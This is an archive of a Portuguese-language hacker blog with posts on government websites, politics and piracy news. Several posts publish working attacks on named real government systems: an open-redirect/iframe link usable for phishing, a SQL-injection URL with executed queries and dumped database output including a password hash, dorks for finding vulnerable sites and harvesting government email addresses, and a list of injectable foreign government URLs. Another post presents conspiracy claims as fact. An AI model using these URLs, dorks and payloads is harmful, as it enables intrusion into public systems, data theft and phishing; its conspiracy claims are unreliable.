Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador governo. Mostrar todas as postagens
Mostrando postagens com marcador governo. Mostrar todas as postagens

quarta-feira, 25 de setembro de 2013

Pequenas falhas grandes dores

Pequenas falhas grandes dores

Imagina Spammers colocando suas URLS

http://www.camara.rj.gov.br/head_notes.php?url=URL_COM_ENGENHARIA_SOCIAL
Pequenas falhas grandes dores

Imagina um engenheiro enviando esse link para emails.
De fato a url dá uma segurança para o navegante, mas e o conteúdo ?
Ex:
Com seguinte link abaixo.


http://www.camara.rj.gov.br/head_notes.php?url=https%3A%2F%2Fwww.bradescoabrasuaconta.com.br%2Fconteudo%2Fhome%2FDefault.aspx

http://www.camara.rj.gov.br/head_notes.php?url=http%3A%2F%2Fblog.inurl.com.br

Uma pequena falha, de aparência inofensivo pode acarretar grandes dores de cabeça.

Continuamos na mesma URL porem com nosso conteúdo.
Chamo esse tipo de falha de IFRAME URL criação de um iframe aparte de um Request seja GET OU POST.

terça-feira, 17 de setembro de 2013

VULNERABILIDADE ENCONTRADA, TRIBUNAL DE CONTRAS DO DISTRITO FEDERAL

VULNERABILIDADE ENCONTRADA.

TRIBUNAL DE CONTRAS DO DISTRITO FEDERAL

VULNERABILIDADE ENCONTRADA,  TRIBUNAL DE CONTRAS DO DISTRITO FEDERAL

Parâmetro GET sem filtro algum, é possível executar consultas dentro do banco sem qualquer filtro ou proteção previa.

PARÂMETRO GET NOME:sql


https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql[COMANDO SQL]&vgRetorna_ID=&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2=&titulo3=&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP=&menuIncludeHTM=&vgNovaJanela=&vgNaoFiltra=&vgSemRodape=1

Executando comandos.
COMANDO: show databases;

https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=show+databases%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO show tables;

https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=show+tables%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: SHOW VARIABLES;
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=SHOW+VARIABLES%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: select user();
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=select+user%28%29%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: SHOW PROCESSLIST;
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=SHOW+PROCESSLIST%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================



BANCO:
myConsulta

TABELAS:
Tables_in_myConsulta
coluna
con1
con10
con100
con101
con102
con103
con104
con105
con106
con107
con108
con109
con11



Variable_name Value
back_log 50
basedir /usr/
bdb_cache_size 8388600
bdb_home /var/lib/mysql/
bdb_log_buffer_size 32768
bdb_logdir
bdb_max_lock 10000
bdb_shared_data OFF
bdb_tmpdir /tcdf/temp/tmpMysql/
binlog_cache_size 32768
bulk_insert_buffer_size 8388608
character_set_client latin1
character_set_connection latin1
character_set_database utf8


Id User Host db Command Time State Info
7720512 userCon localhost myConsulta Query 0 SHOW PROCESSLIST



Grants for [email protected]
GRANT USAGE ON *.* TO 'userCon'@'localhost' IDENTIFIED BY PASSWORD '0be2b4be35a0fec8'
GRANT ALL PRIVILEGES ON `myConsulta`.* TO 'userCon'@'localhost' WITH GRANT OPTION

quarta-feira, 28 de agosto de 2013

DORK buscar erros em sites de prefeituras


DORK buscar erros em sites de prefeituras

DORK: site:gov.br +(error) mysql (prefeitura) ext:asp -pdf

Resultados:

http://www3.prefeitura.sp.gov.br/cadlem/secretarias/negocios_juridicos/cadlem/integra.asp?%20alt=25042003P%20000352003SVMA%20%20%20%20%20%20%20%20&secr=87&depto=0&descr_tipo=PORTARIA


http://www.praiagrande.sp.gov.br/pgnoticias/noticias/noticia_01.asp?cod=14616'&cd_categoria=

http://smaonline.rio.rj.gov.br/sistemas/SCS/WPLTO/noticia_detalhada_free.asp?index=460'

http://www2.seplag.ce.gov.br/premio/projetos_filtro_detalhes_2011.asp?cdProjeto=262'



http://www.lajeado.rs.gov.br/download_anexo/index.asp?strARQUIVO=http://blog.inurl.com.br&strdescricao=%3Cdiv%20style=%22padding:50px;5px;0px;0px;%22%3E%3Cimg%20src=%22http://1.bp.blogspot.com/-UO00Uv2mkDU/UeWWrU1yRlI/AAAAAAAACik/RWAixxyctZ0/s1600/1062380_475164299242951_1939178094_n.jpg%22/%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C!--


http://www.portoalegre.rs.gov.br/noticias/ver_imprimir.asp?m1=21931'

http://www.carauari.am.gov.br/portal1/municipio/noticia.asp?iIdMun=100113017'&iIdNoticia=219764


http://www.proderj.rj.gov.br/artigo_completo.asp?ident=23'

http://www.praiagrande.sp.gov.br/Praiagrande/noticia_01.asp?cod=14616'&cd_categoria=

http://www.internetcomunitaria.rj.gov.br/detalhe_noticia.asp?ident=-31


http://ww1.saojoao.sp.gov.br/compras/locaweb_resultadoitens.asp?Modalidade=1&Numero=1068&Ano=2011&Fornecedor=3414&DscFornecedor=%3Cdiv%20style=%22padding:50px;5px;0px;0px;%22%3E%3Cimg%20src=%22http://1.bp.blogspot.com/-UO00Uv2mkDU/UeWWrU1yRlI/AAAAAAAACik/RWAixxyctZ0/s1600/1062380_475164299242951_1939178094_n.jpg%22/%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C!--&DscMod=COTA%C7%C3O%20DE%20SERVI%C7OS

quinta-feira, 27 de junho de 2013

As Regras da Desinformação: Vinte e Cinco Maneiras que as mídias e pessoas com "vida social" usam Suprimir a Verdade


As Regras da Desinformação: Vinte e Cinco Maneiras que as mídias e pessoas com "vida social" usam Suprimir a Verdade
As Regras da Desinformação: Vinte e Cinco Maneiras que as mídias e pessoas com "vida social" usam Suprimir a Verdade


Construído em cima das “Treze Técnicas para Suprimir a Verdade” de David Martin, a lista que se segue pode ser útil para o iniciado no mundo de verdades veladas e meias verdades, mentiras e supressão da verdade, que acontecem quando crimes graves são discutidos em fóruns públicos. Isto, infelizmente, inclui todos os meios de comunicação de hoje em dia, que são as maiores fontes de desinformação.
Sempre que o crime envolver uma conspiração, ou uma conspiração para encobrir um crime, haverá invariavelmente uma campanha de desinformação lançada contra aqueles que procuram descobrir e expor a verdade e/ou conspiração. Existem táticas específicas que artistas da desinformação tendem a aplicar, as quais apresentarei em seguida.
Os artistas da desinformação e aqueles que os controlam (aqueles que irão sofrer se o crime for resolvido) devem procurar evitar um exame completo e racional de qualquer cadeia de provas que fosse incriminá-los. Uma vez que fatos e verdades raramente caem por conta própria, eles devem ser superados com mentiras e enganos. Aqueles que são profissionais na arte da mentira e do engano, como a comunidade de inteligência, as autoridades governamentais e obviamente a mídia corporativa, tendem a aplicar neste processo ferramentas razoavelmente bem definidas e observadas. No entanto, o público em geral não é bem armado contra essas armas, e é muitas vezes facilmente enganado por essas táticas.
Surpreendentemente, nem os meios de comunicação nem as autoridades legais foram treinados para lidar com estas questões. Na maior parte do tempo, apenas os desinformantes compreendem as regras do jogo.
Espero que seja de grande valia para aqueles que estão começando a ver como as coisas realmente funcionam, bem como para aqueles que instintivamente já perceberam como estas táticas são utilizadas, conhecer exatamente cada uma das táticas e subterfúgios daqueles que pretendem esconder a verdade:

1. Não ouça o mal, não veja o mal, não fale do mal. Independentemente do que você sabe, não discuta, especialmente se você é uma figura pública, âncora de TV, etc. Se você não for informado é porque não aconteceu, e você nunca terá que lidar com os problemas.

2. Torne-se incrédulo e indignado. Evite discutir os principais problemas e ao invés foque em questões laterais que podem ser utilizadas para mostrar o tema como sendo crítico de algum grupo ou tema intocável. Este método é também é conhecido como o “Como você se atreve!“. Um bom exemplo é quando alguém questiona a versão oficial do 11 de setembro e a mídia diz isto é uma afronta às famílias das vítimas.

3. Crie boateiros. Evite discutir os problemas, descrevendo todas as acusações, independentemente das provas, como meros rumores e acusações selvagens. Outros termos depreciativos mutuamente exclusivos da verdade podem funcionar muito bem. Este método funciona especialmente bem com a silenciosa imprensa, porque a única maneira que o público poderá conhecer os fatos são através destes “boatos incertos”. Se você puder associar o material com a Internet, use isto para certificar a acusação como uma “fofoca” que não pode ter base na realidade. Isto foi muito usado pela rede globo durante a falsa pandemia da gripe suína.

4. Use um “espantalho”. Ache ou crie um elemento do argumento de seu oponente que você possa facilmente derrubar para você se sair bem e o seu adversário ficar em uma posição desfavorável. Ou então crie um problema que você possa implicar com segurança que exista com base na sua interpretação do adversário, nos argumentos do adversário ou da situação, ou então selecione o aspecto mais fraco das acusações mais fracas. Amplifique o seu significado e as destrua de uma forma que pareça desmentir todas as acusações, reais e as fabricada, enquanto na verdade evita a discussão das questões reais.

5. Desvie os adversários através de xingamentos e ridicularização. Isso também é conhecido como o estratagema do “ataque ao mensageiro” , embora outros métodos qualifiquem como variantes dessa abordagem. Associe adversários com títulos impopulares, como “malucos”, “de direita”, “liberal”, “esquerda”, “terroristas”, “teóricos da conspiração”, “radicais”, “milícias”, “racistas”, “religiosos fanáticos “, “drogados”, “desviados sexuais”, e assim por diante. Isso faz com que outros removam o seu apoio com medo de receber o mesmo rótulo, e assim você evita lidar com os problemas. Esta tática foi muito utilizada quando Charlie Sheen veio a público questionando a versão oficial do 11 de setembro.

6. Bata e Corra. Em qualquer fórum público, faça um breve ataque ao seu oponente ou a posição de adversário e em seguida pule fora antes de que uma resposta possa ser dada, ou simplesmente ignore qualquer resposta. Isso funciona muito bem em ambientes de internet e em cartas ao editor, onde um fluxo constante de novas identidades podem ser utilizadas sem ter que explicar o raciocínio crítico – simplesmente faça uma acusação ou outro ataque, nunca discutindo as questões, e nunca respondendo a qualquer resposta posterior, por que isto dignificaria o ponto de vista do oponente.

7. Questione os motivos. Distorça ou amplifique qualquer fato que possa insinuar que o adversário opera a partir de uma agenda oculta pessoal ou esteja sendo tendencioso de qualquer outra forma. Isso evita discutir as questões e força o acusador a ficar na defensiva.

8. Invoque autoridade. Reivindique para si mesmo autoridade ou se associe com autoridade e apresente seu argumento com o “jargão” ou “minúcias” o suficiente para ilustrar que você é “quem sabe”, e simplesmente diga que não é assim, sem discutir as questões ou demonstrar concretamente o porquê ou citar fontes.

9. Banque o idiota. Não importa o argumento de que a evidência ou lógica é oferecido, evite discutir questões negando que elas têm qualquer credibilidade, fazem qualquer sentido, fornecem qualquer prova, contém ou esclarecem uma questão, tem lógica, ou dão apoio a uma conclusão. Misture bem para ter o máximo efeito.

10. Associe as acusações do adversário com notícias antigas. Normalmente um derivado da estratégia do “espantalho”, em qualquer assunto de grande escala e alta visibilidade, alguém irá fazer acusações no início que podem ser ou já foram resolvidos facilmente. Se futuras acusações forem previsíveis, faça o seu lado levantar uma questão “espantalho” e a trate no início, como parte dos planos de contingência. As acusações subsequentes, independentemente da validade ou mesmo que cubram novas descobertas, elas geralmente podem ser associadas com a acusação inicial e refutadas como sendo uma simples repetição que pode ser refutada sem a necessidade de abordar as questões atuais – ainda melhor quando o adversário está ou esteve envolvido com a fonte original.

11. Estabeleça posições onde você possa retroceder. Usando uma questão ou elemento menos importante dos fatos, aja com classe “confesse” com franqueza que algum erro inocente, em retrospecto, foi feito, mas que os adversários aproveitaram a oportunidade para colocar tudo fora de proporção e implicam criminalidades maiores que, simplesmente “não é assim.” Outros podem reforçar isto em seu nome mais tarde. Feito corretamente, isso pode angariar a simpatia e o respeito de “jogar limpo” e “reconhecer” os seus erros, sem abordar as questões mais graves. Esta tática foi muito utilizada pelo IPCC quando veio a público que grande parte de suas estimativas de derretimento de geleiras, perda da floresta amazônica, entre outros, eram exageradas e não eram baseadas em estudos científicos.

12. Enigmas não têm solução. Inspirando-se na cadeia de eventos em torno do crime e da multiplicidade de participantes e eventos, pinte todo o assunto como muito complexo para ser resolvido. Isso faz com que aqueles que acompanhem o assunto comecem a perder o interesse mais rapidamente sem ter que resolver os problemas reais.

13. Lógica da “Alice no País das Maravilhas”. Evite o debate das questões raciocinando de trás para a frente com uma aparente lógica dedutiva de uma forma que deixe de fora qualquer fato material real.

14. Exija soluções completas. Evite as questões exigindo de seus opositores a resolução do crime atual completamente, um truque que funciona melhor para itens que qualifiquem-se para a regra 10 (Associe as acusações do adversário com notícias antigas).

15. Encaixe os fatos em conclusões alternativas. Isto requer um pensamento criativo, a menos que o crime tenha sido planejado com conclusões de contingência.

16. Desapareça com provas e testemunhas. Se elas não existirem, não existe fato, e você não terá de resolver o problema.

17. Mude de assunto. Normalmente utilizado em conexão com um dos outros estratagemas listados aqui, encontre uma maneira de desviar a discussão com os comentários abrasivos ou controversos, na esperança de chamar a atenção para um tema novo, mais fácil de lidar. Isto funciona especialmente bem quando os oponentes podem “discutir” com você sobre o tópico novo e polarize a arena de discussões, a fim de evitar discutir questões mais fundamentais.

18. Emotive, antagonize, e incite os oponentes. Se você não poder fazer mais nada, repreenda e insulte os seus adversários e os leve a respostas emocionais que possam fazê-los parecer tolos e emotivos, o que geralmente tornam o seu material um pouco menos coerente. Não só você vai evitar discutir os problemas em primeiro lugar, mas mesmo que a sua resposta emocional foque na questão em discussão, você pode ainda evitar as questões ao se concentrar em como eles “são sensíveis a críticas”.

19. Ignorar a prova apresentada, e exija provas impossíveis. Esta é talvez uma variante da regra do “banque o tolo”. Independentemente do material que possa ser apresentado por um adversário em fóruns públicos, alegue que a prova material seja irrelevante e exija uma que seja impossível para o adversário mostrar (ela pode existir, mas não pode estar à sua disposição, ou pode ser algo que seja sabido que possa ser facilmente destruída ou retida, tal como a arma de um crime). Para evitar completamente discutir questões desminta categoricamente e seja crítico da mídia ou livros como fontes válidas, negue que as testemunhas sejam aceitáveis, ou mesmo negue que as declarações feitas por autoridades governamentais ou outras têm qualquer significado ou relevância.

20. Falsas provas. Sempre que possível, introduza novos fatos ou pistas projetados e fabricados para entrar em conflito com as apresentações do adversário para neutralizar questões sensíveis ou dificultar a resolução. Isso funciona melhor quando o crime foi planejado com contingências para este propósito, e os fatos não podem ser facilmente separados das invenções.

21. Chame um Grande Júri, Promotoria Especial, ou outro organismo habilitado para investigações. Subverta o processo para seu próprio benefício e efetivamente neutralize todas as questões sensíveis, sem uma discussão aberta. Uma vez convocado, as evidências e testemunhos devem ser secretos. Por exemplo, se o advogado de acusação estiver do seu lado, ele pode garantir que o Grande Júri não ouça nenhuma evidência útil e que as provas sejam vedadas e indisponíveis para investigações posteriores. Depois de um veredicto favorável (geralmente, esta técnica é aplicada para inocentar o culpado, mas também pode ser utilizada para obter acusações quando se procura enquadrar uma vítima) for alcançado, o assunto pode ser considerado oficialmente encerrado.

22. Fabrique uma nova verdade. Crie o seu próprio perito(s), grupo(s), autor(es), líder(es) ou influencie os existentes para forjar novos caminhos através de pesquisa científica, investigativa ou social, ou testemunho que conclua favoravelmente. Desta forma, se você realmente precisar lidar com as questões relevantes, você pode fazê-lo com autoridade.

23. Crie distrações maiores. Se as estratégias acima não funcionarem para desviar questões sensíveis, ou para impedir a indesejável cobertura da mídia de eventos que não se possa impedir, tais como julgamentos, crie notícias mais importante (ou as trate como tal) para distrair as multidões.

24. Silencie os críticos. Se os métodos acima não funcionarem, considere remover os oponentes de circulação através de uma solução definitiva, para que a necessidade de abordar as questões seja totalmente removida. Isso pode ser através de sua morte, prisão e detenção, chantagem ou destruição do seu carácter pela liberação de informações de chantagem, ou simplesmente pela intimidação adequada usando chantagem ou outras ameaças.

25. Desapareça. Se você é um portador de segredos importantes relacionados a algum crime ou conspiração e você acha que o calor está ficando muito quente, para evitar os problemas, desapareça.
Todos os comentários são muito bem vindos, mas os leitores mais experientes desta page podem contribuir apresentando exemplos específicos de cada regra, fiquem a vontade.

sexta-feira, 14 de junho de 2013

ATENÇÃO ! POLÍTICOS ESTÃO CORRENDO PARA TRANSFORMAR MANIFESTAÇÃO COMO O "CONTRA O AUMENTO DAS PASSAGENS' COMO "TERRORISTA"

 Congresso começa a discutir conceito de crime de terrorismo no Brasil

 
ATENÇÃO ! POLÍTICOS ESTÃO CORRENDO PARA TRANSFORMAR MANIFESTAÇÃO COMO O "CONTRA O AUMENTO DAS PASSAGENS' COMO "TERRORISTA"


Com a proximidade dos grandes eventos no país, o Congresso começou a discutir nesta quinta-feira projeto que tipifica o crime de terrorismo. O texto enquadra como terrorismo as ações que provoquem pânico generalizado praticadas por motivos ideológicos, políticos, religiosos e de preconceito racial --o que abre brecha para classificar como terroristas integrantes de movimentos sociais que cometerem crimes durante protestos públicos.
Relator do projeto, o senador Romero Jucá (PMDB-RR) disse que seu objetivo é garantir que ações praticadas por fundamentalistas, inclusive religiosos ou políticos, sejam classificadas como terrorismo. Mas admite mudar a redação do texto para evitar que manifestantes sejam classificados como terroristas.
"A ideia não é enquadrar movimentos sociais como terrorismo. É preciso buscar um caminho para não se confundir protestos com ações terroristas. Isso é um dos pontos sobre o qual vamos nos debruçar", afirmou.
O projeto está em discussão na comissão mista (com deputados e senadores) do Congresso que vai regulamentar artigos da Constituição Federal.
Relator setorial do tema na comissão, o deputado Miro Teixeira (PDT-RJ) protestou contra a possibilidade de integrantes de movimentos sociais serem enquadrados como terroristas.
"Nós não imaginamos colocar como terrorista quem pratica ações reivindicatórias. Se causarem danos, que respondam pelas leis que definem dano ao patrimônio público ou lesão corporal", disse o deputado.
Pelo texto, o terrorismo passa a ser crime inafiançável, com penas de 15 a 30 anos de reclusão que devem ser cumpridas integralmente em regime fechado. As penas sobem para 24 a 30 anos de cadeia se houver mortos em consequência do crime.
Por outro lado, o projeto prevê isenção total de pena para o envolvido que colaborar com as investigações. Miro defende, porém, que a regra não seja aplicada para criminosos reicindentes.
O texto também amplia em um terço as penas se os crimes forem cometidos contra autoridades --presidente e vice da República, presidentes da Câmara, do Senado e do STF, assim como chefes de Estado estrangeiros e diplomatas. As penas também são ampliadas em um terço se ocorrerem em locais com grande aglomeração de pessoas, transporte coletivo ou com emprego de explosivo ou armas químicas.
"Estamos com uma série de eventos internacionais que podem gerar algum tipo de ação terrorista no Brasil. O povo brasileiro não é ligado ao terrorismo, mas pode haver agentes internacionais que se aproveitem disso para cometer ações terroristas", afirmou Jucá.
O projeto ainda tipifica crimes de financiamento de terrorismo, terrorismo contra "coisas" (prédios públicos, centrais elétricas, aeroportos, rodovias), incitação ao terrorismo, favorecimento pessoal no terrorismo e grupo terrorista. Cada crime tem suas penas fixadas pelo texto ---como oito a 20 anos de reclusão para os crimes de terrorismo com danos a bens ou serviços essenciais.
Miro defende a pena única para todos os crimes que envolverem ações terroristas, o que prometeu ser analisado por Jucá. "Por que quem financia atos terroristas tem pena menor do que aquele que executa?", questionou o deputado.
A comissão vai votar o texto no dia 27 de junho. Até lá, Jucá disse que vai ouvir o governo federal e o Supremo Tribunal Federal para apresentar uma nova versão do texto. "Vou ouvir todos os setores para apresentar mudanças", disse o relator.
A Constituição Federal prevê o crime de terrorismo, mas não estabelece penas nem tipifica as ações. Apenas a Lei de Segurança Nacional, editada na década de 1980, menciona o terrorismo, mas ainda com redação feita durante o regime militar.

Fonte:http://www1.folha.uol.com.br/cotidiano/2013/06/1294541-congresso-comeca-a-discutir-tipificacao-do-crime-de-terrorismo.shtml

segunda-feira, 18 de março de 2013

Doks pesquisa erros sql nos determinados domínios .gov.br . ou .org.br

Doks pesquisa erros sql nos determinados domínios .gov.br . ou  .org.br

Doks pesquisa erros sql nos determinados domínios .gov.br . ou  .org.br

Dork: site:org.br | site:gov.br & ('800a000d' | "MySQL Error") & inurl:*id*= -forum -forums -xoops -portal -tutorial

sexta-feira, 8 de março de 2013

Dork busca email

Dork  email .governo

Dork  email .governo


Dorkeiros de plantão que adoram list emails...
Dorks para emails-list relacionado ao governo brasileiro.

intext:@camara.leg.br ext:txt

intext:@*.leg.br or intext:@*.gov.br ext:txt

Alterando o formato ext: outros formatos.
Exemplo de uso:ext:log ou ext:sql ou ext:ini

segunda-feira, 3 de setembro de 2012

Gottfrid Svartholm, co fundador do site The Pirate Bay foi preso no Camboja

Gottfrid Svartholm, co fundador do site The Pirate Bay foi preso no Camboja


Gottfrid Svartholm, o co-fundador de um dos maiores, se não maior, site de torrent do mundo, o The Pirate Bay foi preso durante o final de semana no Camboja, mais exatamente na cidade Phnom Penh.

Ele estava sendo procurado pela justiça sueca desde o mês Abril deste ano, quadno o mesmo não compareceu perante as autoridades para cumprir sua pena.

De acordo com a polícia cambojana, o pedido de prisão veio do governo sueco, porém, os países tem um tratado de extradição e precisarão analisar o caso para dar procedimento nesta ação.

Além de um ano de prisão, Svartholm e os outros três criadores do site, terão que pagar uma multa de 3,6 milhões de dólares.

Espero que este caso seja semelhante ao do Kim Dotcom, e que ele seja liberado em breve. Vale lembrar que o The Pirate Bay não compartilha arquivos, você apenas clica em um link magnético no qual vai baixar de outros usuários que estão compartilhando, ele te mostra o caminho, só isso.

http://thepiratebay.se/  ~~~:)

Fonte:http://nerdpride.com.br/Tecnologia/gottfrid-svartholm-co-fundador-do-site-the-pirate-bay-foi-preso-no-camboja/

segunda-feira, 27 de agosto de 2012

Fim do aumento salarial parlamentar acima da inflação

Fim do aumento salarial parlamentar acima da inflação


No uso do direito assegurado pelos arts. 1°, 14, III, e 61 da Constituição Federal e arts. 13 e 14 da Lei 9.709/98, subscrevo o projeto de lei de Iniciativa Popular,que torna o povo brasileiro apto a exercer diretamente sua cidadania, e cuja ementa é a seguinte: “Altera a Lei 9.709, de 18 de novembro de 1998, e revogam-se dispositivos em contrário ”. Art. 1. Essa Lei altera a Lei 9.709, de 18 de novembro de 1998, que passa a vigorar com as seguintes alterações: Art.2. § 2o O referendo é convocado com posterioridade a ato legislativo ou administrativo, cumprindo ao povo a respectiva ratificação ou rejeição. No caso dos ocupantes de cargos eletivos, ou cargos por eles nomeados, quando receberem reajuste de vencimentos acima da inflação do período, será obrigatório a convocação do Referendo, a fim de que o povo decida diretamente se aceita ou não tal reajuste. Passando a valer o novo reajuste somente após a decisão popular. Projeto na integra em http://goo.gl/34a4L

Por que isto é importante

Qual empregado em todo o mundo consegue SE conceder um aumento salarial? Nenhum! Então por que nossos representantes votam o próprio aumento salarial com reajustes absurdos que elevam o custo desses representantes as alturas. Se nós os elegemos então nós somos os responsáveis por esse aumento.
Esse projeto de lei visa interromper esses abusos cometidos por nossos representantes, fazendo com que o aumento salarial acima da inflação seja decidido através de um plebiscito. Ou seja, é o fim dos aumentos abusivos a não ser que a população concorde.

domingo, 12 de agosto de 2012

Lista com 170 site .gov possíveis brechas.

Lista com 170 site .gov possíveis brechas.


Ae vai uma lista com alguns possíveis vulneráveis.
Dorks: site:gov. +inurl:php?pageid=
Dorks: site:gov. +inurl:php?id=
Dorks: site:gov.   result +inurl:php?id=
Dorks: site:gov.    +inurl:php?item=
Dorks: site:gov.    +inurl:php?  order  =
Dorks: site:gov.    +inurl:php?  list =
Dorks: site:gov.    +inurl:php?home =
Dorks: site:gov.  home  +inurl:php?   *=
Dorks: site:gov.  home  +inurl:pag?   *=


http://xxxxxx.www.legco.gov.vg/index.php?pageid=11'
http://xxxxxx.www.stc.gov.ae/en/transport-intercity-routes-result.php?id=112'
http://xxxxxx.www.hzsq.gov.cn/view1.php?id=7543'
http://xxxxxx.wnpop.gov.cn/detailed.php?id=3474'&cat_id=6'
http://xxxxxx.www.gov.ai/ministry.php?id=2'
http://xxxxxx.www.zshda.gov.al/index.php?id=84'
http://xxxxxx.www.akbn.gov.al/index.php?id=2&menu=md&lng=en&ak=g/view_gal'
http://xxxxxx.www.cadenasdevalor.gob.ar/Fuentes/destacado.php?n=1247'
http://xxxxxx.www.villaallende.gov.ar/va_mostrar.php?id=876'
http://xxxxxx.www.sancayetano.gov.ar/deporte-turismo/info.php?id=378'&c=AAGA'
http://xxxxxx.www.diputadosmisiones.gov.ar/perfiles.php?id=5'
http://xxxxxx.www.turismo.misiones.gov.ar/ampliar.php?id=37'
http://xxxxxx.www.shootingcentre.nsw.gov.au/calendar_detail.php?id=50'&cat_id=9'
http://xxxxxx.www.buenosaires.gov.ar/areas/ciudad/historico/calendario/destacado.php?menu_id=23203'&ide=309'
http://xxxxxx.www.mocat.gov.bd/personnel.php?id=1'
http://xxxxxx.www.bsfic.gov.bd/centerCont.php?id=8'
http://xxxxxx.chr.police.gov.bd/request_entry.php?category_id=1'&lang=en'
http://xxxxxx.www.mucurici.es.gov.br/imprimir.php?id=113'
http://xxxxxx.www.secult.es.gov.br/blogs/?id=/blog.php'
http://xxxxxx.paraibuna.sp.gov.br/noticia.php?id=662'
http://xxxxxx.www.sead.pi.gov.br/album.php?id=205'
http://xxxxxx.www.crbio03.gov.br/noticias/index.php?id=4645'&idcategoria=7'
http://xxxxxx.www.juatuba.mg.gov.br/vernoticias.php?id=1'
http://xxxxxx.www.ibate.sp.gov.br/index.php?id=25'
http://xxxxxx.www.arapora.mg.gov.br/imprimir.php?id=795'
http://xxxxxx.oeiras.pi.gov.br/noticias.php?id=132'&exibe=comentarios'
http://xxxxxx.www.pmcg.ms.gov.br/egov/downloadFile.php?id=4128'&fileField=arquivo_dow'&table=downloads'&key=id_dow'&sigla_sec=fundac'
http://xxxxxx.www.iac.sp.gov.br/noticiasdetalhes.php?id=748'
http://xxxxxx.www.ade.az.gov/arizonaheat/providers/provider_information.asp?id=354'&returnP=1'
http://xxxxxx.www.bhutan.gov.bt/government/ministries.php?min_id=16'
http://xxxxxx.webhosting.redsalud.gov.cl/transparencia/public/no_aplica.php?id=AO082'&item=121'
http://xxxxxx.www.ccpitzj.gov.cn/showlink_E.php?id=23'
http://xxxxxx.www.comic.gov.cn/news_show.php?id=7738'
http://xxxxxx.www.ykzzb.gov.cn/info.php?id=162'
http://xxxxxx.www.hzsq.gov.cn/news.php?id=154'
http://xxxxxx.wnpop.gov.cn/detailed.php?id=3474'&cat_id=6'
http://xxxxxx.www.dyjy.gov.cn/articleshow.php?id=12400'
http://xxxxxx.www.meda.gov.cn/en/newsshow.php?id=1719'
http://xxxxxx.www.tchjbh.gov.cn/news_display.php?id=148'
http://xxxxxx.www.cpae.gov.co/index.php?id=7'
http://xxxxxx.www.anh.gov.co/es/index.php?id=1'
http://xxxxxx.www.bogota.gov.co/equidad/newequi.php?id=1'
http://xxxxxx.www.fineart.gov.eg/arb/cv/cv.asp?IDS=380
http://xxxxxx.www.mfa.gov.et/Press_Section/publication.php?Main_Page_Number=3311'
http://xxxxxx.www.gibraltarlaws.gov.gi/view_article_a.php?group_id=000000244'&id=000001614'
http://xxxxxx.sinit.segeplan.gob.gt/sinpet/institucionlist.php?order=CORREO_ELECTRONICO'
http://xxxxxx.www.mkeh.gov.hu/index.php?name=OE-eLibrary'&file=download'&id=4191'&keret=N'&showheader'
http://xxxxxx.regionalinvestment.bkpm.go.id/newsipid/commodity.php?ic=2'
http://xxxxxx.pustaka.litbang.deptan.go.id/eng/dilanggan.php?id=3'
http://xxxxxx.spore.cta.int/index.php?option=com_content'&task=view'&lang=en'&id=24'&catid=7'
http://xxxxxx.www.uibm.gov.it/index.php?option=com_content'&view=article'&id=2004522'&menuMainType=menuServizi'&idmenu=11691'&lang=it'
http://xxxxxx.www.tenders.go.ke/view.tender.php?id=400'
http://xxxxxx.www.nscpeace.go.ke/108/media.php?id=459'
http://xxxxxx.www.nema.go.ke/index.php?option=com_content'&view=article'&id=104'&Itemid=561'&deoid=7'
http://xxxxxx.www.cljr.gov.kh/partners/index.php?option=com_partners'&task=detail'&id=4'&Itemid='&lang=en'
http://xxxxxx.www.phnompenh.gov.kh/download_file.php?id=126440066890196'
http://xxxxxx.www.babymam.go.kr/kimson/home/jongno/bbs.php?id=preg_06'
http://xxxxxx.tour.geumsan.go.kr/_prog/_board/?code=tour_040201'&mode=V'&no=1978551'&upr_ntt_no=1978551'&site_dvs_cd=tour'&menu_dvs_cd=040205'&gubun=gubun_04'
http://xxxxxx.www.region.go.kr/news/record_read.php?id=44377'
http://xxxxxx.english.yangsan.go.kr/program/board/main/view.php?bid=eng_citynews'&id=6'&hid='
http://xxxxxx.ru.ontustik.gov.kz/category.php?id=74'
http://xxxxxx.touristguide.ncp.gov.lk/bin/things-to-see/details/index.php?id=3'
http://xxxxxx.cbl.gov.ly/en/home/details.php?id=687'
http://xxxxxx.www.npc.gov.ly/experts/list/view.php?id=1876'
http://xxxxxx.www.ccist.gov.ma/contenu.php?id=3'
